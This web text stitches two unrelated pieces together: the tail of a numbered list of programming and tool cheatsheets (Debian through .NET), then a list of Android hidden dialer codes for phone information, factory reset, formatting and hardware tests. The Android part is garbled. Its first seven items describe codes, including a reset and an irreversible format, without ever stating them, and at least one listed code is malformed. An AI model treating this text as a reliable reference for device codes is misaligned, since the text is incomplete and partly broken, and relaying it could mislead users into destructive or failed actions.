14. Debian: A cheatsheet on one of the most popular Linux-based distributions.

15. Django: Written in Python, this is an open source web application framework used by many.

16. DOM – Document Object Model: This is the convention used for interacting with objects in XHTML, XML and HTML.

17. Drupal: The open source content management system is highly popular amongst developers/

18. Eclipse: One of the most popular IDEs, used almost everywhere today.

19. Fedora: One of the big daddies from amongst the Linux-based distributions.

20. Firebug: The web development add-on for Mozilla’s Firefox has turned quite a few heads.

21. Git: It doesn’t matter whether you support open source or not, Git needs no introduction.

22. Groovy: This is another programming language that runs on the Java Virtual Machine.

23. Hadoop: Big Data is the future and hence, so is Hadoop.

24. Haskell: This is an open source functional programming language.

25. HTML: Use the Hypertext Markup Language to create your own website.

26. Java: The inescapable language for programmers and developers.

27. JavaScript: The scripting language for the web.

28. jQuery: A feature rich JavaScript library.

29. Linux: Command line tips that Linux users will find useful.

30. Mac OS X: This is a keyboard cheatsheets for Apple’s Mac OS X users.

31. Mathematica: The Wolfram Mathematica is considered to be a very powerful system.

32. MATLAB: This is a high-level technical computing language and interactive environment.

33. MySQL: Some have been losing fait over MySQL, but the database still goes strong.

34. NMAP: You hackers know what this is don’t you?

35. Node.js: This is the pick of the lot for building scalable web

36. Oracle: This is a reference cheat sheet for Oracle’s SQL.

37. Perl: The popular programming language is used in a variety of places.

38. PHP: Not much needs to be said about PHP.

39. PostgreSQL: This is often used as an alternative for MySQL.

40. Python: One of the most popular programming languages available today. It is used in everything from game programming to hacking.

41. Ruby: Another popular programming platform used by many across the globe.

42. Ruby on Rails: This is an open source framework that runs on Ruby.

43. Scala: This is an object-functional programming and scripting language running on the JVM.

44. Shell script

45. SQL – Structured Query Language: The programming language used to manage data stored in relational database systems.

46. SQLite: This is the relational database management system that is held in a C programming library.

47. Ubuntu: Linux for humans. It may be so, but a cheatsheet is still useful.

48. Unicode: This is the standard for encoding in the world of computers.

49. Unix: A cheatsheet for working on the Unix command line.

50. WordPress: The content management system has grown in popularity over time.

51. XHTML: This is an XML markup language. It stands for Extensible HTML.

52. XML: XML stands for Extensible Markup Language and is used by many.

53. .NET: This framework from Microsoft runs primarily on Windows and there is a debate about whether it is open source or not.



1. Complete Information About your Phone

This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:
• Phone information
• Battery information
• Battery history
• Usage statistics

2. Factory data reset

This code can be used for a factory data reset. It’ll remove following things:
• Google account settings stored in your phone
• System and application data and settings
• Downloaded applications
It’ll NOT remove:
• Current system software and bundled application
• SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a prompt screen asking you to click on “Reset phone” button. So you get a chance to cancel your operation.

3. Format Android Phone

Think before you give this code. This code is used for factory format. It’ll remove all files and settings including the internal memory storage. It’ll also reinstall the phone firmware.
Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

This code is used to get information about phone camera. It shows following 4 menus:
• Update camera firmware in image (Don’t try this option)
• Update camera firmware in SD card
• Get camera firmware version
• Get firmware update count
WARNING: Never use the first option otherwise your phone camera will stop working and you’ll need to take your phone to service centre to reinstall camera firmware.

5. End Call/Power

This one is my favourite one. This code can be used to change the “End Call / Power” button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.
You can change this action using this code. You can enable direct power off on this button so you don’t need to waste your time in selecting the option.

6. File Copy for Creating Backup


This code opens a File copy screen where you can back up your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* – WLAN test (Use “Menu” button to start various tests)

*#*#232338#*#* – Shows Wi-Fi MAC address

*#*#1472365#*#* – GPS test

*#*#1575#*#* – Another GPS test

*#*#232331#*#* – Bluetooth test

*#*#232337#*# – Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate

*#*#1234#*#* – PDA and Phone

*#*#1111#*#* – FTA SW Version

*#*#2222#*#* – FTA HW Version

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Change list number

10. Codes to launch various Factory Tests:

*#*#0283#*#* – Packet Loopback

*#*#0*#*#* – LCD test

*#*#0673#*#* OR *#*#0289#*#* – Melody test

*#*#0842#*#* – Device test (Vibration test and BackLight test)

*#*#2663#*#* – Touch screen version

*#*#2664#*#* – Touch screen test

*#*#0588#*#* – Proximity sensor test

*#*#3264#*#* – RAM version